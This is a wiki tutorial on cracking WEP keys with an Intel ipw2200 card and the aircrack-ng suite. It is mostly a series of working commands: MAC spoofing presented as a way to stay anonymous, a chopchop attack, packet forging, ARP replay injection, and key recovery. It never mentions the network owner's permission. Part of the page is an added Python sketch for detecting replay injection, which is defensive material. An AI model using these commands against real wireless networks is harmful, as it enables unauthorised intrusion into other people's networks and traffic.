Tutorial: How to crack wep using an ipw2200 based card

Version: 0.1 August 27, 2007
By: drio


  1. How to compile from scratch the device driver to support injection
  2. screen usage example
  3. Different attacks
  4. More detailed explanation about what we are doing on each step
  5. upgrade airodump-ng tools from the livecd.


This document is based on this post, which you can find in the forums.

When I started using the aircrack-ng tools I did not have the best hardware for it. I only had an IBM Thinkpad T42 that comes with an Intel 2200BG card. Most WEP attacks require injecting packets into the network in order to speed up the process of gathering IVs. To do that, the device driver that controls the card has to support injection. This tutorial explains how to compile and install modules on your Linux box. Installing Linux on my box was not an option, so I decided to use the backtrack2 livecd. Backtrack already comes with the necessary drivers compiled and ready to be used directly from the CD.

Here are the basic steps we will be going through:

  • 1 - Verify that our ipw2200 card is recognized by the OS (Linux).
  • 2 - List available networks
  • 3 - Change the MAC address of our card.
  • 4 - Configure the wireless parameters using iwconfig.
  • 5 - Collect data with airodump-ng
  • 6 - Launch the chopchop attack
  • 7 - Create the ARP request packet
  • 8 - Send the ARP request over and over
  • 9 - Wait to gather enough IVs
  • 10 - Crack the WEP key using aircrack-ng

Keep in mind that we are going to be running different commands and we will need to switch between them. Most documents recommend starting X Window and then opening several xterm windows. There is another option: screen.

Verify that our ipw2200 card is recognized by the OS (Linux)

Once the livecd has booted and you have logged on, you can run this to verify that you actually have an ipw2200-based card:

      # lspci -vv 
      02:02.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05)
              Subsystem: Intel Corporation Unknown device 2711
              Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B-
              Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium >TAbort- <TAbort- <MAbort- >SERR- <PERR-
              Latency: 64 (750ns min, 6000ns max), Cache Line Size: 32 bytes
              Interrupt: pin A routed to IRQ 11
              Region 0: Memory at c0210000 (32-bit, non-prefetchable) [size=4K]
              Capabilities: [dc] Power Management version 2
              Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+)
              Status: D0 PME-Enable- DSel=0 DScale=1 PME-

That command lists all the devices connected to the PCI bus. You should see something similar to this when you run it on your machine. Note that I removed most of the output.

Now, since you have an Intel 2200BG-based card, Linux should have autoloaded the ipw2200 device driver for you:

       # lsmod | grep ipw2200
       ipw2200    ......

When I used backtrack2 to test this, the rtap0 interface was not created after booting the livecd. We need rtap0 up and running. We can tell the device driver to create the interface by writing to rtap_iface:

       # echo 1 > /sys/class/net/eth1/device/rtap_iface

That's the method I would recommend. But, if you are using the latest version of airodump-ng (we'll use it in the next section) you can tell the program to create the rtap0 device for you:

       # airodump-ng -c X rtap0

We'll talk about it in the next section.

Ok, so we have verified that we have an ipw2200 card and that Linux can talk to it.

List available networks

Now, we want to get a list of the wireless networks we have around. To do that:

       # iwlist eth1 scan

Keep the output of this command in a window; we will use it later.


I am assuming that Linux mapped your wireless card under eth1. Most likely you have an ethernet card under eth0.

Change the MAC address of our card

This step is optional but it will give us some anonymity. In a new window:

     # ifconfig eth1 up hw ether 00:11:22:33:44:55

Configure the wireless parameters

Let's start configuring the wireless essid, channel, and setting up a fake key:

     # iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed

Due to some limitations with the firmware we have to force a fakekey and set managed mode to ensure the aircrack-ng tools work properly.

ESSID is the name of the wireless network of our target AP. Channel is the wireless channel.

Collect data with airodump-ng

In another window, we start collecting data:

     # airodump-ng -c <channel> --bssid <AP MAC> -w dump rtap0

Notice how we use rtap0 as the input interface. Also, all the commands we are going to be running generate output files, so it is a good idea to create a new directory and run all of them from there.

As we said before, if you are running the latest version of airodump-ng, rtap0 will be created for you automatically if you did not create it earlier.

Launch the chopchop attack

Now it is time to do some injection. In a new window we will launch the chopchop attack:

     # aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1

Note the modifier “-i rtap0.” This tells aireplay to use rtap0 for listening and eth1 for injecting. Also “-4” is the type of attack (chopchop).

A prompt will ask you to use “this” packet. Type “y” and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream (.xor) file. The keystream file will be named something like “replay_dec-######.xor”.

Make sure there are no errors reported after using aireplay. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine.

If the attack fails, try rerunning the command, omitting the “-h <AP MAC>” parameter.

Create the arp request packet

Now we will create an arp-request packet using the acquired keystream file. The “-l” and “-k” options are the source IP and destination IP. If you use valid destination IPs then you will be running an amplification attack. This can be run in the same window where we ran the chopchop attack:

   # packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k -l -y replay_dec-####.xor -w arp-request

Send the arp request over and over

Finally we will send our newly created arp-request packet over and over. After this step you should see the “Data” count begin to rise quickly back in the window where we had airodump-ng running. If the data does not rise (usually by between 80 and 350 per second), then something is wrong.

    # aireplay-ng -2 -r arp-request eth1
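
Seen from a monitoring sensor, the replay step above has a recognizable shape: one transmitter re-sending the same encrypted frame, and therefore the same IV and length, at a sustained high rate. The Python sketch below is an added example, not part of the original tutorial or of aircrack-ng; the record format, the thresholds (the lower bound of 80 frames per second is taken from the text) and the sample data are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict

def find_replay_sources(frames, window_ms=1000, min_rate=80, min_repeat=0.9):
    """Flag transmitters that repeat one (IV, length) pair at a high rate.

    frames: iterable of (timestamp_ms, src_mac, iv, length) records
            (hypothetical format, e.g. exported from a monitor-mode sensor).
    Returns {src_mac: (peak_frames_in_window, share_of_most_repeated_frame)}.
    """
    by_src = defaultdict(list)
    for ts, src, iv, length in frames:
        by_src[src].append((ts, iv, length))

    flagged = {}
    for src, recs in by_src.items():
        recs.sort()
        seen = Counter()          # (iv, length) -> count inside the window
        start = 0
        for end, (ts, iv, length) in enumerate(recs):
            seen[(iv, length)] += 1
            # Slide the window: drop records older than window_ms.
            while ts - recs[start][0] >= window_ms:
                key = recs[start][1:]
                seen[key] -= 1
                if seen[key] == 0:
                    del seen[key]
                start += 1
            total = end - start + 1
            share = max(seen.values()) / total
            if total >= min_rate and share >= min_repeat:
                if total > flagged.get(src, (0, 0.0))[0]:
                    flagged[src] = (total, share)
    return flagged

def sample_capture():
    """Constructed records for illustration, not a real capture."""
    frames = []
    # Ordinary client: 20 frames/s for 3 s, a fresh IV on every frame.
    for i in range(60):
        frames.append((i * 50, "00:aa:bb:cc:dd:01", 0x100000 + i, 90 + (i % 7) * 40))
    # Replaying station: one frame re-sent every 5 ms (200 frames/s) for 2 s.
    for i in range(400):
        frames.append((1000 + i * 5, "00:11:22:33:44:55", 0x0A1B2C, 68))
    return frames

if __name__ == "__main__":
    for mac, (rate, share) in find_replay_sources(sample_capture()).items():
        print(f"{mac}: {rate} frames/s, {share:.0%} identical IV and length")
```

A busy but legitimate client can exceed the rate threshold, which is why the check also requires that nearly all frames in the window share one IV and length.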

Wait to gather enough IVs

We now have to wait for airodump-ng to gather enough data (enough IVs) to run aircrack-ng. How many packets do we need for aircrack-ng to crack the WEP key? It depends. The version of aircrack-ng that comes with backtrack2 is not the latest one, so we need around 1.000.000 IVs. If we are using the latest version (0.9 and up), 100.000 is enough.

Crack the wep key using aircrack-ng

In another window we launch:

    # aircrack-ng -z dump*.cap

Depending on the number of packets you have gathered, this may take some minutes or you may get the key immediately. The -z argument tells aircrack-ng to also try the PTW attack. If your version of aircrack-ng doesn't support it, just omit it.


aircrack-ng can run concurrently with airodump-ng. This is very interesting because it will allow you to check the number of IVs that airodump-ng has gathered. You can cancel the execution of aircrack-ng and wait for more data to be gathered.

ipw2200_generic.txt · Last modified: 2009/09/26 14:27 by darkaudax